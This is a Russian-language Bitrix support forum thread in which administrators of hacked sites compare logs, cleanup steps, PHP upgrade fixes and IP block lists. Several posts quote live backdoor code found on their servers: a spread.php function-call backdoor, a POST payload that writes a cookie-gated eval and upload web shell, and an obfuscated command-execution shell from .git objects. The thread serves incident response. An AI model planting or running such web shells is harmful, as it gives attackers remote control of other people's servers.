Разработчикам

Форум

Взломаны сайты в честь дня конституции украины

Пользователь 7086178

Заглянувший

Сообщений: 6 Баллов: 2 Регистрация: 01.03.2023

#491

04.03.2023 14:23:19

Цитата

написал:
На наши серверы стали постить не на главную страницу, а на /bitrix/tools/spread.php.
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "POST /bitrix/tools/spread.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:49.0) Gex
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "GET /bitrix/admin/1dbc26cfe5c3.php HTTP/1.1" 403 124 " "Mozilla/5.0 (Windows NT x
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "POST /bitrix/tools/spread.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NTx
m185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "GET /bitrix/admin/1dbc26cfe5c3.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NT

Предварительно заблочили весь ASN https://asn.ipinfo.app/AS210644 провайдера aeza, заметили что оттуда оосновная масса вредоносных запросов поступает. Блокировали через правила в nginx (через include запрещающих правил типа https://asn.ipinfo.app/api/text/nginx/AS210644 ). Репорт на абуз серверов отправлен дня 4 назад, пров молчит как партизан.

Знаю, что костыль и что это не решение проблемы, но пока так..

Загляните в spread.php. Найдете такой код:

Код
if(isset($_REQUEST["state"]) && is_string($_REQUEST["state"])) { $arState = array(); parse_str(base64_decode($_REQUEST["state"]), $arState); echo $arState[0]($arState[1],$arState[2]); die(); }

Методика та же что и в bx_root - Вызов любой функции с 2-мя аргументами пришедшими из интернета. Удалите или закомментриуйте его. Это тоже следствие. Причины пока ищу.

Пользователь 46525

Посетитель

Сообщений: 29 Баллов: 4 Регистрация: 03.08.2009

#492

04.03.2023 15:16:29

У меня появилась аналогичная проблема как и у всех с битрик в конце февраля.
Удалил десятки тысяч файлов .htaccess. Потом решил восстановить из бэкапа когда их еще не было.
Но потом как и выше сказано 1-2 раза в сутки начали появляться рандомные файлы с вирусами.
Прочитав все этот форум, решил обновиться... Этого очень давно не делал. php 5.6 стоял.
Купил лицензию, обновил, не все модули хотят обновляться.
Но все же решил переключить на php 8 и вот что выдает

Код

[Error] 
Undefined constant "Bitrix\Main\Diag\ASSERT_QUIET_EVAL" (0)
/var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/lib/diag/exceptionhandler.php:244
#0: Bitrix\Main\Application->initializeExceptionHandler()
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/lib/application.php:105
#1: Bitrix\Main\Application->initializeBasicKernel()
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/start.php:164
#2: require_once(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/include.php:10
#3: require_once(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/include/prolog_admin_before.php:18
#4: require_once(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/interface/desktop.php:2
#5: require(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/admin/index.php:2

Как корректно обновиться?
Буду благодарен помощи

Пользователь 46525

Посетитель

Сообщений: 29 Баллов: 4 Регистрация: 03.08.2009

#493

04.03.2023 15:45:53

Пробую еще как вариант пока тоже самое сделать на php 7, 7.2, 7.4 , результат не лучше

Код

[Error] Call to undefined function mysql_connect() (0)
/var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/classes/mysql/database_mysql.php:19
#0: CDatabase->ConnectInternal()
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/classes/general/database.php:215
#1: CAllDatabase->DoConnect()
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/classes/mysql/database_mysql.php:74
#2: CDatabase->ForSql(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/classes/general/main.php:4708
#3: CAllLanguage::GetList(NULL, NULL, array)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/classes/mysql/main.php:47
#4: CMain->GetLang()
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/include.php:48
#5: require_once(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/include/prolog_admin_before.php:18
#6: require_once(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/interface/desktop.php:2
#7: require(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/admin/index.php:2

Пользователь 13618 Эксперт Сообщений: 1363 Баллов: 231 Регистрация: 05.04.2011 Сертифицированный партнер	#494 0 04.03.2023 16:53:15 Зачем Вы сюда это выкинули? У Вас есть действующая лицензия, обратитесь в службу поддержки. Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 515353

Заглянувший

Сообщений: 22 Баллов: 2 Регистрация: 04.03.2016

#495

04.03.2023 16:55:43

Ошибку с БД можно исправить, поправив 2 файла:

/bitrix/.settings.php замените

Код
'className' => '\\Bitrix\\Main\\DB\\MysqlConnection'

на

Код
'className' => '\\Bitrix\\Main\\DB\\MysqliConnection'

/bitrix/php_interface/dbconn.php добавьте
Код
define("BX_USE_MYSQLI", true);

Создание и поддержка сайтов: https://evgenydonich.ru

Пользователь 46525

Посетитель

Сообщений: 29 Баллов: 4 Регистрация: 03.08.2009

#496

04.03.2023 17:40:59

Цитата

написал:
Ошибку с БД можно исправить, поправив 2 файла:
/bitrix/.settings.php замените

Код
'className' => '\\Bitrix\\Main\\DB\\MysqlConnection'

на

Код
'className' => '\\Bitrix\\Main\\DB\\MysqliConnection'

/bitrix/php_interface/dbconn.php добавьте

Код
define( "BX_USE_MYSQLI" , true );

Спасибо! Получилось постепенно обновиться поочередно поднимая php

Пользователь 700243

Заглянувший

Сообщений: 11 Баллов: 1 Регистрация: 11.09.2018

#497

04.03.2023 20:33:15

А у меня вот таким теперь весь лог забит, перебирают порты:

Код

[Sat Mar 04 14:53:03.782421 2023] [access_compat:error] [pid 11862] [client 188.x.x.x:45338] AH01797: client denied by server configuration: /www/x-x.com/public_html/
[Sat Mar 04 14:53:06.298049 2023] [access_compat:error] [pid 610] [client 188.xxx.x.x:45346] AH01797: client denied by server configuration: /www/x-x.com/public_html/, referer: http://x-x.com/
[Sat Mar 04 14:53:34.792772 2023] [access_compat:error] [pid 11858] [client 188.x.x.x:52554] AH01797: client denied by server configuration: /www/x-x.com/public_html/04a9c540c814.php, referer: http://x-x.com/
[Sat Mar 04 14:53:34.977464 2023] [access_compat:error] [pid 27581] [client 188.x.x.x:52558] AH01797: client denied by server configuration: /www/x-x.com/public_html/, referer: http://x-x.com/04a9c540c814.php
[Sat Mar 04 14:53:35.135490 2023] [access_compat:error] [pid 14831] [client 188.x.x.x:52566] AH01797: client denied by server configuration: /www/x-x.com/public_html/04a9c540c814.php, referer: http://x-x.com/

Проблема в том, что 188.x.x.x — это адрес моего сервера, а referrer x-x.com — мой сайт. Типа подмена реферрера и IP? Левых процессов на сервере вроде не вижу, да и смысл ломится с сервера на него же тоже нет вроде бы. Нечисть с сайта вычистил, новая вроде не появляется. Заблочил пока по IP в htaccess сетку, которую камрады выше приводили, в htaccess:

Код

   Order Allow,Deny 
   Deny from 79.137.206.0/24
   Deny from 212.113.106.0/24
   Deny from 85.192.40.0/23
   Deny from 45.15.159.0/24
   Deny from 109.172.45.0/24
   Deny from 89.208.103.0/24
   Deny from 2a0e:d602:3::/48
   Deny from 79.137.207.0/24
   Deny from 2a0e:d602::/48
   Deny from 2a0e:d607::/48
   Deny from 2a0e:d602:2::/48
   Deny from 45.15.158.0/24
   Deny from 45.142.122.0/24
   Deny from 79.137.202.0/23
   Deny from 79.137.248.0/24
   Deny from 79.137.204.0/23
   Deny from 77.91.84.0/22
   Deny from 185.17.0.0/24
   Deny from 185.112.83.0/24
   Deny from 85.192.56.0/24
   Deny from 89.208.104.0/22
   Deny from 176.124.198.0/23
   Deny from 79.137.194.0/23
   Deny from 2a0e:d602:1::/48
   Deny from 212.113.119.0/24
   Deny from 77.91.78.0/24
   Deny from 45.138.74.0/24
   Deny from 80.85.241.0/24
   Deny from 85.192.63.0/24
   Deny from 5.252.118.0/24
   Deny from 212.113.116.0/24
   Deny from 185.229.65.0/24
   Deny from 78.153.130.0/24
   Deny from 185.174.137.0/24
   Deny from 185.106.94.0/24
   Deny from 77.73.131.0/24
   Deny from 91.193.43.0/24
   Deny from 79.137.196.0/22
   Deny from 194.26.229.0/24
   Deny from 195.20.16.0/24
   Deny from 185.229.66.0/24
   Deny from 89.185.85.0/24
   Deny from 185.174.136.0/24
   Deny from 2a0e:d606::/48
   Allow from all

зы С IP вроде бы разобрался — это глюк панели хостинга с криво настроенным mod_remote, но это не точно

Пользователь 10202

Заглянувший

Сообщений: 15 Баллов: 1 Регистрация: 18.03.2007

#498

05.03.2023 08:44:49

Кто-нибудь разобрался что дальше происходит после того, как приходит POST с таки содержимым на главную:

Код

(
   [bitrixxx] => file_put_contents($_SERVER['DOCUMENT_ROOT'].'/2a4e67218e9b.php','<?=409723*20;if(md5($_COOKIE[d])=="17028f487cb2a84607646da3ad3878ec"){echo"ok";eval(base64_decode($_REQUEST[id]));if($_POST["up"]=="up"){@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}}?>');
)

Попытка поискать файлы с текстом bitrixxx, а также повторить запрос через Postman не создает файл.

Пользователь 7086178

Заглянувший

Сообщений: 6 Баллов: 2 Регистрация: 01.03.2023

#499

05.03.2023 14:30:07

Внимательно перечитал всю тему. Большое спасибо авторам постов, вся информация о том как ломают и что делать здесь есть. Сведу все еще раз для таких как я - впервые увидевших 1С Битрикс. Сейчас есть 2 основные уязвимости для необновленных Битриксов. Это vote и html_editor_action. Пока не обновитесь, удалите найденные бэкдоры ( spread.php, bx_root.php, агенты и т.д. ) и поставьте заглушки в файлы:
/bitrix/tools/html_editor_action.php
/bitrix/tools/vote/uf.php

Приводит ли к взлому найденная мной последовательность в логах php://filter/convert.iconv.UTF8.CSISO2022KR выясню позже. Может это действительно был какой-то запрос не для Битрикса.

Пользователь 45908

Заглянувший

Сообщений: 1 Регистрация: 27.03.2017

#500

05.03.2023 15:03:46

Спасибо всем за эту тему. Мои пять копеек: на одном старом сайте (из пяти пострадавших) нашёл ещё три "подарка" в папке .git.

Палятся по тому, что git gc начинает ругаться "bad sha1..." с путём к файлам .git/objects/6a/e93177.php .git/objects/7a/c13cf3.php
внутри что-то вот такое (оставлено самое интересное, хостер бегет эти вещи спалил своим скриптом проверки,кстати)

Код

$down = "which get;which wget;which lynx;which curl;which fetch;which links;";
            $aTwo = "ba" . "se" . "6" . "4" . "_" . "en" . "co" . "de";
            $bTwo = "ba" . "se" . "6" . "4" . "_" . "de" . "co" . "de";
            $fun = $bTwo("cGhwIC1yICdwcmludF9yKGdldF9kZWZpbmVkX2Z1bmN0aW9ucygpKTsnIHwgZ3JlcCAtRSAnIChzeXN0ZW18ZXhlY3xzaGVsbF9leGVjfHBhc3N0aHJ1fHByb2Nfb3Blbnxwb3BlbnxjdXJsX2V4ZWN8Y3VybF9tdWx0aV9leGVjfHBhcnNlX2luaV9maWxlfHNob3dfc291cmNlKSc");
            if (isset($_POST['cmd'])) {
                echo '<pre>';
                $a1($_POST['cmd']);

и один "загрузчик фоточек для форума" в .git/objects/7a/c13cf3.php, внутри отличительные черты это строки

"648ae5b4a83b380bc7e163b26c28950b"

header('Content-Description: gallery Transfer');

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером